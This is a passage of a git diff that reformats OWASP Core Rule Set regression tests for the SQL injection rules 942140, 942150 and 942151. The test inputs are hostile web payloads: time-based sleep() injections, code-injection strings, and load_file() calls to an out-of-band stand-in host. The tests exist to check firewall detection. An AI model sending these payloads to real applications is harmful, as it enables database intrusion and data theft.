text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "msdb" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 10 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "mysql.db" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "mysql.db" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 11 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "MSysAccessObjects" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "MSysAccessObjects" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 12 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Northwind" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Northwind" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 13 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "northwind" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "northwind" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 14 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SCHEMA_NAME" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SCHEMA_NAME" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 15 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "DATABASE(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "DATABASE(" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 16 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "schema_name" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "schema_name" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 17 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "information_schema" - version: HTTP/1.0 - output: - log_contains: id "942140" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "information_schema" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml index c13060656..9f3347554 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml @@ -2,328 +2,327 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942150.yaml +rule_id: 942150 tests: - - test_title: 942150-1 + - test_id: 1 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1' and sleep(9) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1' and sleep(9) #" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1(select*from(select(sleep(5)))d)" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1(select*from(select(sleep(5)))d)" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 4 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test')and (select*from(select(sleep(10)))d)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test')and (select*from(select(sleep(10)))d)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 6 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=config.ini' and sleep(91) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=config.ini' and sleep(91) #" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 7 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=None')and (select*from(select(sleep(10)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=None')and (select*from(select(sleep(10)))a)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 8 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 9 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=file:/init.ini'.sleep(12).'" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=file:/init.ini'.sleep(12).'" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 10 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 11 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 12 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 13 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test{${sleep(12)}}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test{${sleep(12)}}" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 14 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 15 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 16 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\foobar.txt\" or sleep(4) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\foobar.txt\" or sleep(4) #" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 17 desc: "SQLite 'json' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 18 desc: "SQLite 'json_valid' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 19 desc: "SQLite 'glob' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" - version: HTTP/1.0 - output: - log_contains: id "942150" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml index 1b938cf32..cd940dd78 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml @@ -2,189 +2,188 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942151.yaml +rule_id: 942151 tests: - - test_title: 942151-1 + - test_id: 1 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo'||(select extractvalue(xmltype('%tocob;" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo'||(select extractvalue(xmltype('%tocob;" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 3 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 4 desc: "Simple injection using 'fetch_in_set'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=, FIND_IN_SET('22', Category )" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=, FIND_IN_SET('22', Category )" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 5 desc: "SQL injection using 'likelihood' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 6 desc: "SQL injection using SQLite 'sqlite_compileoption_used' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 7 desc: "SQL injection using SQLite 'sqlite_compileoption_get' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 8 desc: 